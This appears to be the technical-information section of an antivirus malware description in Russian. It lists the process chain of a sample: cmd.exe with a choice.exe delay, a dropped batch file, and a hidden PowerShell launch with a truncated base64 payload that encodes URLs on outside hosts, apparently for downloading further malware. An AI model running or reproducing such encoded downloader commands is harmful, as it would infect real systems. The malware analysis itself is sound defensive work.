Техническая информация
- '<SYSTEM32>\cmd.exe' /c choice /C Y /N /D Y /T 3&start /B /WAIT powershell -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwBtAHkAdABlAGwAZQBmAG8AbgBpAHMAdAAuAGQAZQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAEwAbQA4AGYAeABWAD...
- %ALLUSERSPROFILE%\vkwer.bat
- '<SYSTEM32>\cmd.exe' /c choice /C Y /N /D Y /T 3&start /B /WAIT powershell -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwBtAHkAdABlAGwAZQBmAG8AbgBpAHMAdAAuAGQAZQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAEwAbQA4AGYAeABWAD...' (со скрытым окном)
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 3
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwBtAHkAdABlAGwAZQBmAG8AbgBpAHMAdAAuAGQAZQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAEwAbQA4AGYAeABWADIATQAvACwAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AeQBlAGEAbABk...